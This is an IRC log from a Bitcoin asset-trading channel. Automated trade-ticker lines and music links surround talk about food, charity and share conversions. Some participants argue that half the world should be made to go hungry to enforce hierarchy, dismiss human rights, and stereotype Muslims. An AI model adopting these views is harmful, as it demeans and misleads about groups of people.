05:58:22 [BTCTC] [ASICMINER-PT] 1 @ 1.43 BTC [+] Sep 24 05:59:22 [BTCTC] [ASICMINER-PT] 5 @ 1.431 = 7.155 BTC [+] Sep 24 06:00:56 you actually want more humans, the20year3? Sep 24 06:01:17 On earth? Sep 24 06:01:35 yeah Sep 24 06:01:43 Doesn't bother me either way Sep 24 06:02:22 Although i'd be happier if the median living standard of the average person in the world was higher than it is today. And from what I figure that can only be accomplished with educating people on a worldwise basis of how to be productive Sep 24 06:02:36 wrong Sep 24 06:02:44 how do, Vexual? Sep 24 06:03:02 nah, the living standards are much too high. Sep 24 06:03:07 whaddaya mean? Sep 24 06:03:11 theres history of people going into third world countries and teaching best practice Sep 24 06:03:11 its not smarter people we need its smarter robots Sep 24 06:03:17 ideally about half the population should experience hunger outside of their own control a day a week. Sep 24 06:03:26 [MPEX] [S.MPOE] 3000 @ 0.00092932 = 2.788 BTC [+] Sep 24 06:03:53 do you regularly do that mircea_popescu Sep 24 06:03:53 currently this is less than a tenth. Sep 24 06:04:00 hey heres a new variety we made, and put some charcoal on your crop, cya! Sep 24 06:04:03 the20year3 "the" ? Sep 24 06:04:13 i mean that lol. what that ? Sep 24 06:04:27 [BTCTC] [FN] [DMS.SELLING] 300 @ 0.0065 = 1.95 BTC [-] Sep 24 06:04:27 20 generations of knowledge fucked uot the window Sep 24 06:04:31 do you regularly experience hunger beyond your control Sep 24 06:04:48 this is specifically to directly and clearly enforce their inferiority to me and my superiority to them. Sep 24 06:04:48 i do Sep 24 06:04:59 it's not a "we're all the same", quite the contrary. we are unlike. Sep 24 06:05:15 everyman can feel hungry Sep 24 06:05:17 What do you base this on? Sep 24 06:05:26 the20year1 the20year3 TheSeven thestringpuller ThickAsThieves thoa_afk Sep 24 06:05:42 the20year3 i don't base it on anything. challenging it should be based on things. Sep 24 06:05:45 many many things. Sep 24 06:06:06 Vexual sure, they can. some should. not all ever will. hierarchy, thus happiness. Sep 24 06:06:24 i dont eat and walk far just to feel human Sep 24 06:06:25 human rights are bullshit Sep 24 06:06:30 fabrications Sep 24 06:06:33 jesus heals though Sep 24 06:06:35 the only reality is power Sep 24 06:06:40 human rights exist against the state, not against nature. Sep 24 06:07:11 Vexual: which examples are you referring to? Sep 24 06:07:23 whit regards to what? Sep 24 06:07:33 20 generations of knowledge out the window Sep 24 06:07:38 africa Sep 24 06:07:47 probably all he actual agricultural knowledge, fucked by superior industrial methods. Sep 24 06:07:50 In regards to what , colonial knowledge? Sep 24 06:07:57 think hard before you donate to any charity Sep 24 06:08:00 and for the record europe's no different. Sep 24 06:08:02 mircea_popescu: how many farms do you deal with? Sep 24 06:08:09 what's "deal with" mean ? Sep 24 06:08:19 Personally interacting with farmers and land Sep 24 06:08:27 i dunno, a dozen or two ? Sep 24 06:08:33 something like that depending how you define it. Sep 24 06:08:34 you in ag? Sep 24 06:08:39 nope. i just eat healthy. Sep 24 06:08:48 Because locally i'm seeing trends towards farm automation Sep 24 06:08:58 for instance yest i made a pot of beans out of a leg of pork smoked the classical way. Sep 24 06:09:01 Automatic harvesting of crops, and the like, making it significantly more efficient and effective Sep 24 06:09:16 Why aren't you consuming a diet of pure chemicals? Sep 24 06:09:18 it does, sure. but i don't care, i have money and i don't believe in feeding everyone. Sep 24 06:09:33 the20year3 im not the guy comparing prices in asda you realise ? Sep 24 06:09:45 that doesn't change the fact that "20p cheaper" is actually a criteria directing lives. Sep 24 06:10:11 For some yes, but not everyone is price driven Sep 24 06:10:31 your argument runs into the very ample majority of price argumentation in the fcmg sector. Sep 24 06:10:46 fmcg* Sep 24 06:11:19 If FMCG was entirely price dictated, there would be no premium products or brands Sep 24 06:11:41 but the argument is not to entirely, the argument is to majority. Sep 24 06:12:02 That the majority of people choose price over performance? Sep 24 06:12:27 most people buy by price, with tiny fluctuation restructuring their consumption. this pushes producers to control costs, which leads to substitution, of actual ingredients with chemically derived erszatz. Sep 24 06:12:35 [BTCTC] [FN] [DMS.SELLING] 2849 @ 0.00619068 = 17.6372 BTC [-] {4} Sep 24 06:12:40 If that was true, Faygo and commercial grade beef would be king in the US Sep 24 06:12:56 so therefore, as an economic agent, if you can replace the nicely smoked leg of pork with some pink goop, you have to. Sep 24 06:12:58 But , last time I checked ,faygo did a fraction of what Pepsi and Coca-cola do Sep 24 06:13:10 the us is a 300mn market in a 8bn ocean. Sep 24 06:13:36 [BTCTC] [FN] [DMS.SELLING] 900 @ 0.006 = 5.4 BTC [-] Sep 24 06:13:39 and i don't grok the pepsi notion. you can't be telling me pepsi is anything but "the cheapest drink we can make" ? Sep 24 06:13:52 it's about 5x the price of budget drinks in the US Sep 24 06:13:58 tee. Sep 24 06:14:00 that changes nothing. Sep 24 06:14:06 soda is the new beer Sep 24 06:14:12 obesity is the new mass drunkenness Sep 24 06:14:26 well beer is really the new soda, by now they're no longer even fermenting it. just flavouring soda with "beer". Sep 24 06:14:40 in some places i suppose Sep 24 06:14:46 Good thing the rest of the world is catching up to us here in the US Sep 24 06:14:51 actually for everyone i guess Sep 24 06:14:54 (In terms of obesity) Sep 24 06:15:08 obvious effect of feeding the world on liquid corn Sep 24 06:15:08 did yousee that article showing animals catching up to ? marmosets etc ? Sep 24 06:15:21 mircea_popescu: wat Sep 24 06:15:36 ;;google obesity marmoset rats Sep 24 06:15:37 David Berreby – The obesity era - Aeon Magazine: ; Eating solid food early sets marmosets on path to obesity: ; Obesity On the Rise in Animals | LiveScience: Sep 24 06:15:47 the last one Sep 24 06:16:43 im off to buy one cocked chicken, comprising of one chicken, and six bottles of beer comprising water, 18 grains of barley and an amount of sugar Sep 24 06:17:05 Maybe I can buy that new liquid drink that can sustain life for $9 a day Sep 24 06:17:32 pump the environment full of estrogen-like plastic byproducts Sep 24 06:17:34 what could go wrong Sep 24 06:17:35 cocked ?! Sep 24 06:17:52 spatch cocked? Sep 24 06:18:18 in othere news, "British Child Sex Slave, 11, had her butt branded with an “M” for Mohammed, her Muslim captor" Sep 24 06:21:23 dont be sick in the head Sep 24 06:22:54 hey, it's the daily mail. Sep 24 06:28:47 `sex slavery is extraordinarily popular Sep 24 06:28:51 [BTCTC] [BASIC-MINING] 6 @ 0.0848 = 0.5088 BTC [+] Sep 24 06:29:17 apparently it's a muslim thing. Sep 24 06:29:24 Nope, it's a worldwide thing Sep 24 06:30:02 Although i haven't seen any societial/religious breakdowns, the stats I've seen seem to indicate it's worldwide and not contained very much by boarders and people groups Sep 24 06:30:13 a worldwide thing in muslim places. Sep 24 06:30:20 from cambodgia to south africa Sep 24 06:30:53 [BTCTC] [BASIC-MINING] 20 @ 0.08496 = 1.6992 BTC [+] Sep 24 06:31:54 [HAVELOCK] [CFIG] 10 @ 0.103598 = 1.036 BTC [+] Sep 24 06:31:55 [BTCTC] [FN] [DMS.SELLING] 400 @ 0.006 = 2.4 BTC [-] Sep 24 06:32:01 to the US , canada and the UK Sep 24 06:32:24 right. Sep 24 06:32:46 I know in my small town of 10k there was a sex slave ring busted that resulted in 20 girls being released Sep 24 06:32:55 [BTCTC] [BASIC-MINING] 90 @ 0.08498 = 7.6482 BTC [+] Sep 24 06:36:07 there is a markedt Sep 24 06:36:11 it doth hunger Sep 24 06:43:14 also buzinbg here boss of helicopters, single rotor, attack/tarnsport, dont know keywoprd Sep 24 06:44:14 m10???!?!?! Sep 24 06:44:19 theyre boss Sep 24 06:44:57 shall we dissect the capitol input of my purchases? Sep 24 06:45:33 kinda senseless without a measure of output Sep 24 06:49:01 be vary wary of chairty Sep 24 06:50:47 hi everybody Sep 24 06:50:57 its sad that one can' give money to an orphanage in cambodia without a thought Sep 24 06:51:26 is Namworld here? Sep 24 06:52:24 but religion became philosphy then science and whatver all this is now, all the while, too much info Sep 24 06:54:00 ;;seen namworld Sep 24 06:54:00 namworld was last seen in #bitcoin-assets 2 days, 16 hours, 25 minutes, and 49 seconds ago: Hmm, well I'm off. Enough crazy reads for today. Sep 24 06:55:17 [BTCTC] [FN] [DMS.SELLING] 200 @ 0.0065 = 1.3 BTC [+] Sep 24 06:55:21 wanna see my coconuts? Sep 24 06:56:06 i really don't know what to do with them Sep 24 06:57:20 [BTCTC] [LABCOIN] 1217 @ 0.0012542 = 1.5264 BTC [-] {3} Sep 24 07:02:25 [BTCTC] [ASICMINER-PT] 2 @ 1.419 = 2.838 BTC [-] Sep 24 07:04:49 http://www.tiikoni.com/tis/view/?id=7912622 Sep 24 07:04:52 coconuts Sep 24 07:05:28 [BTCTC] [LABCOIN] 2000 @ 0.001254 = 2.508 BTC [-] {4} Sep 24 07:06:29 [BTCTC] [LABCOIN] 7000 @ 0.00125252 = 8.7676 BTC [-] {4} Sep 24 07:10:33 [BTCTC] [ASICMINER-PT] 14 @ 1.41985714 = 19.878 BTC [+] {2} Sep 24 07:15:38 [BTCTC] [DMS.MINING] 107 @ 0.00126 = 0.1348 BTC [-] {2} Sep 24 07:17:39 [BTCTC] [FN] [DMS.SELLING] 85 @ 0.0059 = 0.5015 BTC [-] Sep 24 07:21:43 [BTCTC] [ACTIVEMINING] 2444 @ 0.00169144 = 4.1339 BTC [+] {3} Sep 24 07:21:43 [BTCTC] [ASICMINER-PT] 4 @ 1.3825 = 5.53 BTC [-] {3} Sep 24 07:31:53 [BTCTC] [LABCOIN] 3000 @ 0.001253 = 3.759 BTC [-] Sep 24 07:40:07 http://www.youtube.com/watch?v=nswTNDMDHZY Sep 24 07:40:10 So Many Soldiers - YouTube Sep 24 07:42:04 http://www.usatoday.com/story/news/politics/2013/09/19/tom-delay-conviction-overturned-money-laundering/2837053/ Sep 24 07:42:05 Texas court overturns Tom DeLay conviction Sep 24 07:42:13 so this is pretty good. us court finds cheques aren't money. Sep 24 07:46:23 http://www.youtube.com/watch?v=vEB0l6OqLR4 Sep 24 07:46:24 Cruel Sea - You Better Get A Lawyer (Studio 22) - Tex Perkins/Beasts Of Bourbon related - YouTube Sep 24 07:49:10 [BTCTC] [LABCOIN] 200 @ 0.001252 = 0.2504 BTC [-] Sep 24 07:51:18 http://www.youtube.com/watch?v=n4FOiVM4bQc Sep 24 07:51:20 the beach boys - fun, fun, fun - YouTube Sep 24 07:55:35 last one Sep 24 07:55:38 http://www.youtube.com/watch?v=WJTwgMTI704 Sep 24 07:55:39 Kaoma - Lambada (HQ) - YouTube Sep 24 07:56:24 till daddy took your bitcoin away Sep 24 08:01:13 feels good to buy wharfendales with ltcg protits Sep 24 08:02:15 i dropped dr dick yeaterday too, he must have had an anurism Sep 24 08:02:29 y? bcause i gotta! Sep 24 08:03:11 ok 1 more NSFW, crazy people only Sep 24 08:03:51 http://www.youtube.com/watch?v=wXpfAGmI_pE Sep 24 08:03:52 LEE PERRY AND THE SOULETTES...DOCTOR DICK. - YouTube Sep 24 08:05:27 [BTCTC] [B] [CIPHERMINE.B1] 53 @ 0.00999811 = 0.5299 BTC [+] {2} Sep 24 08:06:22 dilemma Sep 24 08:06:28 [HAVELOCK] [DEALCO] 33 @ 0.00800001 = 0.264 BTC [-] Sep 24 08:10:32 [BTCTC] [LABCOIN] 2169 @ 0.001252 = 2.7156 BTC [-] Sep 24 08:10:43 dub it up for the trilemmas Sep 24 08:13:28 keep reading Sep 24 08:13:35 [BTCTC] [LABCOIN] 6450 @ 0.0012511 = 8.0696 BTC [-] {3} Sep 24 08:14:16 does anyone have experience with cryptocambios? Sep 24 08:17:39 [BTCTC] [CRYPTO-TRADE] 10 @ 0.14028 = 1.4028 BTC [-] {3} Sep 24 08:18:40 [BTCTC] [ET.DIFF.LONG] 30 @ 0.01223333 = 0.367 BTC [+] {2} Sep 24 08:19:41 [BTCTC] [KENILWORTH] 500 @ 0.00121 = 0.605 BTC [-] Sep 24 08:19:41 [MPEX] [S.MPOE] 876 @ 0.00092894 = 0.8138 BTC [-] Sep 24 08:20:39 whats cryptocambiso? Sep 24 08:21:48 ;;google cryptocambios Sep 24 08:21:49 Cryptocambios: ; BitPagos Uses Merchant Processing To Bring Bitcoin To Argentina ...: ; BitCoin Examiner — Your guide to the BitCoin Economy: Sep 24 08:22:05 is it running another blockchain so dirty money can be laundered? Sep 24 08:22:09 wasn't so hard now was it Vexual Sep 24 08:22:43 well i can google, but if its not a thing. Sep 24 08:23:01 its not athing Sep 24 08:23:20 on what metric? Sep 24 08:23:45 [BTCTC] [ASICMINER-PT] 2 @ 1.419 = 2.838 BTC [+] Sep 24 08:23:45 is it different fron laundrycoin? Sep 24 08:23:45 [BTCTC] [BASIC-MINING] 5 @ 0.0849 = 0.4245 BTC [-] Sep 24 08:24:14 i didnt read. im being silly Sep 24 08:24:19 we can tell. Sep 24 08:25:17 consumer product for brazil? fill me in Sep 24 08:25:46 [HAVELOCK] [AM1] 2 @ 1.547 = 3.094 BTC [+] Sep 24 08:26:23 do you remember how this conversation started? Sep 24 08:26:41 everyone left argentina 5 years ago Sep 24 08:26:47 [BTCTC] [ET.DIFF.SHORT] 22 @ 0.00709995 = 0.1562 BTC [+] {2} Sep 24 08:27:42 oh yeah? Sep 24 08:28:54 yeah it's totally empty nao. Sep 24 08:28:57 population 18 Sep 24 08:30:10 gold watches aint money Sep 24 08:31:08 and not veryone can drive f1 Sep 24 08:31:52 [BTCTC] [FN] [DMS.SELLING] 401 @ 0.00589129 = 2.3624 BTC [-] {4} Sep 24 08:31:52 [BTCTC] [ACTIVEMINING] 439 @ 0.001787 = 0.7845 BTC [-] Sep 24 08:31:53 i'd be content in this case with a jeep Sep 24 08:32:02 something well made Sep 24 08:32:17 probably of the hand-to-hand in a cafe sort Sep 24 08:32:19 are jeeps made in argentina? Sep 24 08:32:53 [BTCTC] [ET.DIFF.SHORT] 24 @ 0.0076325 = 0.1832 BTC [+] {2} Sep 24 08:32:53 [BTCTC] [ACTIVEMINING] 120 @ 0.00179 = 0.2148 BTC [+] Sep 24 08:34:55 [BTCTC] [ASICMINER-PT] 1 @ 1.42 BTC [+] Sep 24 08:35:12 good point tho mp, peple who are someone oft fly low Sep 24 08:35:56 [BTCTC] [ASICMINER-PT] 1 @ 1.42 BTC [+] Sep 24 08:36:17 i noticed some middel class sxodus Sep 24 08:37:56 its all eq seculative conjecture tho, got no metrics Sep 24 08:37:58 [HAVELOCK] [B] [XBOND] 353 @ 0.00128 = 0.4518 BTC [-] {2} Sep 24 08:39:43 too much info, not enough brains Sep 24 08:42:29 physics and english Sep 24 08:43:59 no thermo? Sep 24 08:44:18 thats physics Sep 24 08:44:54 http://www.youtube.com/watch?v=YbiaCF_qsrg Sep 24 08:44:55 :) Sep 24 08:44:55 Tenor Saw - Ring The Alarm - YouTube Sep 24 08:47:07 [HAVELOCK] [DEALCO] 42 @ 0.00800001 = 0.336 BTC [-] Sep 24 08:49:32 this ones for mp Sep 24 08:49:42 http://www.youtube.com/watch?v=DzPkqEGe9Hc Sep 24 08:49:43 Barrington Levy - Broader Than Broadway - YouTube Sep 24 08:50:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14 BTC [-] Sep 24 08:53:13 [BTCTC] [KENILWORTH] 18829 @ 0.00120496 = 22.6882 BTC [-] {3} Sep 24 08:53:53 extra spice, extra nice Sep 24 08:55:16 [BTCTC] [BMF] 24 @ 0.0299 = 0.7176 BTC [+] Sep 24 08:58:51 srtaya Sep 24 08:59:01 https://www.youtube.com/watch?v=l1jXtHkVJOA Sep 24 08:59:02 aussie-bogan-headbutts-windscreen-1.wmv - YouTube Sep 24 09:02:23 [HAVELOCK] [AM100] 20 @ 0.015 = 0.3 BTC [-] Sep 24 09:02:24 [BTCTC] [ASICMINER-PT] 1 @ 1.4 BTC [-] Sep 24 09:04:06 fuckin straya cunt Sep 24 09:04:24 context now Sep 24 09:05:13 http://www.youtube.com/watch?v=giCmURBT1dg Sep 24 09:05:15 Jimmy Barnes - Khe Sanh - YouTube Sep 24 09:05:15 strayn Sep 24 09:05:40 fucken strayns Sep 24 09:05:52 poor, poor sheep and various farm animals Sep 24 09:07:00 200 years aint shit Sep 24 09:07:28 [BTCTC] [BMF] 210 @ 0.03 = 6.3 BTC [+] Sep 24 09:07:28 [HAVELOCK] [CBTC] 12204 @ 0.00039978 = 4.8789 BTC [-] {5} Sep 24 09:07:29 [BTCTC] [ASICMINER-PT] 3 @ 1.4 = 4.2 BTC [-] {2} Sep 24 09:09:08 leo might find his sydney atm dissapears Sep 24 09:16:37 [BTCTC] [LABCOIN] 6789 @ 0.00132494 = 8.995 BTC [+] {4} Sep 24 09:19:23 put a bunch of theive on an island and let em breed Sep 24 09:20:09 http://www.youtube.com/watch?v=ajeL87l3prM Sep 24 09:20:11 Billy Bunks - Devil's Clay - YouTube Sep 24 09:20:41 [BTCTC] [LABCOIN] 1602 @ 0.001327 = 2.1259 BTC [+] {2} Sep 24 09:22:54 http://www.youtube.com/watch?v=y-PTxCwUas0 Sep 24 09:22:56 Briggs - Rapper Tag #7 - YouTube Sep 24 09:24:45 [BTCTC] [LABCOIN] 2000 @ 0.001328 = 2.656 BTC [+] Sep 24 09:25:30 hunter is dead from ass cancer, so i play this instread Sep 24 09:25:41 http://www.youtube.com/watch?v=1iwC2QljLn4 Sep 24 09:29:36 http://www.youtube.com/watch?v=UqzJkl1vV7I Sep 24 09:29:38 Mad Max - YouTube Sep 24 09:30:51 [BTCTC] [ACTIVEMINING] 166 @ 0.001669 = 0.2771 BTC [+] Sep 24 09:34:55 [BTCTC] [LABCOIN] 4000 @ 0.001328 = 5.312 BTC [+] {2} Sep 24 09:34:55 [BTCTC] [ASICMINER-PT] 1 @ 1.414 BTC [+] Sep 24 09:36:25 suffering for my art Sep 24 09:36:56 [BTCTC] [LABCOIN] 1280 @ 0.00134131 = 1.7169 BTC [+] {2} Sep 24 09:44:03 [BTCTC] [LABCOIN] 2000 @ 0.0013787 = 2.7574 BTC [+] {5} Sep 24 09:45:04 [BTCTC] [LABCOIN] 4500 @ 0.00141631 = 6.3734 BTC [+] {9} Sep 24 09:46:05 [BTCTC] [ASICMINER-PT] 1 @ 1.414 BTC [+] Sep 24 09:46:06 [BTCTC] [ACTIVEMINING] 300 @ 0.00164348 = 0.493 BTC [-] {3} Sep 24 09:47:06 [BTCTC] [ASICMINER-PT] 2 @ 1.4145 = 2.829 BTC [+] {2} Sep 24 09:48:07 [BTCTC] [ASICMINER-PT] 1 @ 1.418 BTC [+] Sep 24 09:49:09 [BTCTC] [ASICMINER-PT] 11 @ 1.4190909 = 15.61 BTC [+] {3} Sep 24 09:50:09 [BTCTC] [ASICMINER-PT] 5 @ 1.4316 = 7.158 BTC [+] {3} Sep 24 09:50:55 http://www.youtube.com/watch?v=e4UJLHFkWZ8&feature=related Sep 24 09:50:57 Yes Sir Boss ft Joss Stone - Come Together - YouTube Sep 24 09:51:10 [BTCTC] [ASICMINER-PT] 1 @ 1.467 BTC [+] Sep 24 09:52:12 [BTCTC] [ASICMINER-PT] 5 @ 1.469 = 7.345 BTC [+] Sep 24 09:53:13 [BTCTC] [ASICMINER-PT] 2 @ 1.491 = 2.982 BTC [+] {2} Sep 24 09:54:14 [BTCTC] [ASICMINER-PT] 2 @ 1.509 = 3.018 BTC [+] {2} Sep 24 09:55:15 [BTCTC] [LABCOIN] 2957 @ 0.00130097 = 3.847 BTC [-] {7} Sep 24 09:55:15 [BTCTC] [ASICMINER-PT] 24 @ 1.51820833 = 36.437 BTC [+] {6} Sep 24 09:56:16 [BTCTC] [ASICMINER-PT] 3 @ 1.51633333 = 4.549 BTC [-] {2} Sep 24 09:56:26 http://www.youtube.com/watch?v=c1zJzr-kWsI Sep 24 09:56:28 Dolly Parton - Coat of many colors - YouTube Sep 24 09:57:17 [BTCTC] [ASICMINER-PT] 13 @ 1.53915384 = 20.009 BTC [+] {5} Sep 24 09:58:18 [BTCTC] [B] [CIPHERMINE.B1] 61 @ 0.00800163 = 0.4881 BTC [-] {2} Sep 24 09:58:18 [BTCTC] [ASICMINER-PT] 1 @ 1.52 BTC [-] Sep 24 09:59:19 [BTCTC] [ASICMINER-PT] 11 @ 1.545 = 16.995 BTC [+] Sep 24 09:59:57 http://www.youtube.com/watch?v=N6wBxQVBozI Sep 24 09:59:59 Willie Nelson and Shania Twain, Blue eyes crying in the rain - YouTube Sep 24 10:01:21 [BTCTC] [ASICMINER-PT] 11 @ 1.545 = 16.995 BTC [+] Sep 24 10:02:22 [BTCTC] [ASICMINER-PT] 8 @ 1.55812499 = 12.465 BTC [+] {3} Sep 24 10:03:23 [BTCTC] [ASICMINER-PT] 1 @ 1.56 BTC [+] Sep 24 10:05:29 http://www.youtube.com/watch?v=fqQ3vlz3deI Sep 24 10:05:37 The Beatles- The Walk (Complete Version) - YouTube Sep 24 10:07:27 [BTCTC] [ASICMINER-PT] 3 @ 1.544 = 4.632 BTC [-] Sep 24 10:08:25 http://www.youtube.com/watch?v=Q8Tiz6INF7I Sep 24 10:08:26 Hit the road Jack - YouTube Sep 24 10:08:28 [HAVELOCK] [AM100] 57 @ 0.01499824 = 0.8549 BTC [-] {3} Sep 24 10:08:29 [BTCTC] [ASICMINER-PT] 17 @ 1.55811764 = 26.488 BTC [+] {2} Sep 24 10:12:32 [HAVELOCK] [DEALCO] 35 @ 0.0075 = 0.2625 BTC [-] Sep 24 10:13:03 http://www.youtube.com/watch?v=6SJFaUqwuQY Sep 24 10:13:04 Afroman - Hungry Hustler - YouTube Sep 24 10:19:59 http://www.youtube.com/watch?v=paoFmPW8lLo Sep 24 10:20:01 Sarah Blasko - Hey Ya (OutKast cover) - YouTube Sep 24 10:23:14 http://www.youtube.com/watch?v=n7TXBuVUQJw Sep 24 10:23:18 I was only 19 - YouTube Sep 24 10:26:46 [BTCTC] [COGNITIVE] 1 @ 0.139 BTC [+] Sep 24 10:27:46 [BTCTC] [BASIC-MINING] 9 @ 0.07621 = 0.6859 BTC [-] {2} Sep 24 10:28:59 https://www.youtube.com/watch?v=BBsazIACpYM Sep 24 10:29:01 Stone Roses - Fools Gold(Full Version) - YouTube Sep 24 10:32:51 [BTCTC] [ACTIVEMINING] 136 @ 0.001701 = 0.2313 BTC [+] Sep 24 10:36:55 [BTCTC] [ACTIVEMINING] 100 @ 0.001711 = 0.1711 BTC [+] Sep 24 10:44:03 [BTCTC] [LABCOIN] 471 @ 0.00138698 = 0.6533 BTC [+] {2} Sep 24 10:44:37 i fyour lawyer cant pretect your income, how can they prectect your freedom Sep 24 10:44:54 god luck ethan Sep 24 10:45:04 [BTCTC] [LABCOIN] 248 @ 0.001388 = 0.3442 BTC [+] Sep 24 10:45:18 https://www.youtube.com/watch?v=ysUPGI5R30Y Sep 24 10:45:20 (What's the Story) Morning Glory FULL ALBUM-OASIS - YouTube Sep 24 10:56:15 [BTCTC] [LABCOIN] 495 @ 0.001407 = 0.6965 BTC [+] Sep 24 10:57:16 [MPEX] [S.MPOE] 8472 @ 0.0009209 = 7.8019 BTC [-] Sep 24 10:57:16 [BTCTC] [ASICMINER-PT] 1 @ 1.58 BTC [+] Sep 24 10:58:17 [HAVELOCK] [AM100] 30 @ 0.015 = 0.45 BTC [+] Sep 24 11:00:19 [HAVELOCK] [AM1] 1 @ 1.614 BTC [+] Sep 24 11:02:21 [BTCTC] [ACTIVEMINING] 115 @ 0.001686 = 0.1939 BTC [-] Sep 24 11:06:25 [BTCTC] [ASICMINER-PT] 1 @ 1.56 BTC [-] Sep 24 11:10:29 [MPEX] [S.MPOE] 8480 @ 0.00092124 = 7.8121 BTC [+] {2} Sep 24 11:12:31 [BTCTC] [ACTIVEMINING] 329 @ 0.00171958 = 0.5657 BTC [+] {2} Sep 24 11:18:37 [BTCTC] [BITVPS] 255 @ 0.0011 = 0.2805 BTC [-] Sep 24 11:18:37 [BTCTC] [ASICMINER-PT] 5 @ 1.56 = 7.8 BTC [-] Sep 24 11:19:38 [BTCTC] [ASICMINER-PT] 3 @ 1.56 = 4.68 BTC [-] Sep 24 11:19:39 [HAVELOCK] [SDSTM] 100 @ 0.0023322 = 0.2332 BTC [-] {2} Sep 24 11:23:42 [BTCTC] [LABCOIN] 20000 @ 0.00127061 = 25.4122 BTC [-] {25} Sep 24 11:23:52 http://www.youtube.com/watch?v=Fyl5FptiaUs Sep 24 11:23:53 Spiderbait - Four On The Floor - YouTube Sep 24 11:25:44 [BTCTC] [COGNITIVE] 15 @ 0.159 = 2.385 BTC [+] Sep 24 11:26:45 [BTCTC] [ASICMINER-PT] 14 @ 1.57285714 = 22.02 BTC [+] {3} Sep 24 11:26:45 [BTCTC] [COGNITIVE] 5 @ 0.1593 = 0.7965 BTC [+] {3} Sep 24 11:27:46 [BTCTC] [CRYPTO-TRADE] 20 @ 0.16962 = 3.3924 BTC [+] {4} Sep 24 11:29:45 http://www.youtube.com/watch?v=G3VnX0hf_yM Sep 24 11:29:46 Chopper at Neville Bartos (The Movie) - YouTube Sep 24 11:32:51 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1699 = 0.6796 BTC [+] Sep 24 11:37:03 no cash Sep 24 11:37:39 here is radio nairobi Sep 24 11:44:01 [HAVELOCK] [AM1] 1 @ 1.6141 BTC [+] Sep 24 11:44:03 [BTCTC] [ASICMINER-PT] 1 @ 1.644 BTC [+] Sep 24 11:45:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.178 BTC [+] Sep 24 11:46:04 [BTCTC] [BTC-BOND] 11 @ 0.009444 = 0.1039 BTC [+] Sep 24 12:02:20 [BTCTC] [ACTIVEMINING] 1022 @ 0.00175071 = 1.7892 BTC [+] {5} Sep 24 12:02:20 [BTCTC] [ASICMINER-PT] 1 @ 1.485 BTC [-] Sep 24 12:04:34 Hey guys, Any news on the AM-PT asset on btc-tc is everything going back to FC? Sep 24 12:07:33 back to direct shraes or havelock prolly Sep 24 12:07:39 acording to FC latest post Sep 24 12:11:29 [HAVELOCK] [CBTC] 9916 @ 0.00039979 = 3.9643 BTC [+] {3} Sep 24 12:13:10 Ogedei_: If I'd like to have them on Havelock with TaT, what procedure should I follow? Sep 24 12:15:33 [BTCTC] [LABCOIN] 1200 @ 0.001294 = 1.5528 BTC [-] {2} Sep 24 12:16:34 [BTCTC] [LABCOIN] 550 @ 0.00129366 = 0.7115 BTC [-] {2} Sep 24 12:17:30 got to wait theres no procedures yet Sep 24 12:21:39 [BTCTC] [LABCOIN] 217 @ 0.001287 = 0.2793 BTC [-] Sep 24 12:22:40 [MPEX] [S.MPOE] 5900 @ 0.0009238 = 5.4504 BTC [+] {2} Sep 24 12:33:51 [BTCTC] [FN] [DMS.SELLING] 300 @ 0.0065 = 1.95 BTC [-] Sep 24 12:43:00 [MPEX] [S.MPOE] 9367 @ 0.00092079 = 8.625 BTC [-] {2} Sep 24 12:44:01 [BTCTC] [BASIC-MINING] 21 @ 0.08494952 = 1.7839 BTC [+] {3} Sep 24 12:45:02 [BTCTC] [BASIC-MINING] 6 @ 0.0849 = 0.5094 BTC [-] Sep 24 12:46:03 [BTCTC] [BASIC-MINING] 6 @ 0.08497 = 0.5098 BTC [+] Sep 24 12:47:04 [BTCTC] [ASICMINER-PT] 1 @ 1.521 BTC [+] Sep 24 12:47:05 [BTCTC] [BASIC-MINING] 6 @ 0.08498 = 0.5099 BTC [+] Sep 24 12:48:05 [BTCTC] [LABCOIN] 5000 @ 0.00127395 = 6.3698 BTC [-] {6} Sep 24 12:50:01 Ogedei_ , There has been a process for converting ASICMINER-PT shares to AM1 shares on Havelock all along Sep 24 12:50:42 Please review the text for AM1 https://www.havelockinvestments.com/fund.php?symbol=AM1 Sep 24 13:03:20 [HAVELOCK] [AM1] 58 @ 1.61415862 = 93.6212 BTC [+] {4} Sep 24 13:03:21 [BTCTC] [LABCOIN] 53901 @ 0.00120589 = 64.9987 BTC [-] {24} Sep 24 13:04:21 [BTCTC] [LABCOIN] 9332 @ 0.00112575 = 10.5055 BTC [-] {6} Sep 24 13:05:22 [BTCTC] [ASICMINER-PT] 2 @ 1.521 = 3.042 BTC [+] {2} Sep 24 13:06:23 [BTCTC] [LABCOIN] 19800 @ 0.00110555 = 21.8899 BTC [-] {4} Sep 24 13:16:33 [BTCTC] [RSM] 34 @ 0.003 = 0.102 BTC [-] Sep 24 13:18:35 [HAVELOCK] [AM100] 10 @ 0.015 = 0.15 BTC [+] Sep 24 13:22:26 http://www.youtube.com/watch?v=nU1VfYYKMDk Sep 24 13:22:28 Spiderbait - Black Betty - YouTube Sep 24 13:35:52 [MPEX] [S.MPOE] 6000 @ 0.00092144 = 5.5286 BTC [+] Sep 24 13:48:04 [MPEX] [S.MPOE] 14363 @ 0.00092461 = 13.2802 BTC [+] {3} Sep 24 13:52:09 [HAVELOCK] [AM100] 100 @ 0.015 = 1.5 BTC [+] Sep 24 14:00:17 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [-] Sep 24 14:01:18 [BTCTC] [ASICMINER-PT] 2 @ 1.4795 = 2.959 BTC [-] {2} Sep 24 14:02:19 [BTCTC] [ASICMINER-PT] 1 @ 1.48 BTC [+] Sep 24 14:02:19 [MPEX] [S.MPOE] 15400 @ 0.00091888 = 14.1508 BTC [-] {2} Sep 24 14:03:20 [BTCTC] [LABCOIN] 135 @ 0.0012 = 0.162 BTC [-] Sep 24 14:04:21 [BTCTC] [LABCOIN] 135 @ 0.001199 = 0.1619 BTC [-] Sep 24 14:05:22 [BTCTC] [ACTIVEMINING] 248 @ 0.00171311 = 0.4249 BTC [-] {4} Sep 24 14:06:23 [MPEX] [S.MPOE] 15482 @ 0.00091754 = 14.2054 BTC [-] {4} Sep 24 14:06:23 [BTCTC] [LABCOIN] 3240 @ 0.001207 = 3.9107 BTC [+] Sep 24 14:18:34 [MPEX] [S.MPOE] 2200 @ 0.00092536 = 2.0358 BTC [+] Sep 24 14:25:41 [BTCTC] [ASICMINER-PT] 3 @ 1.48 = 4.44 BTC [+] {3} Sep 24 14:26:42 [BTCTC] 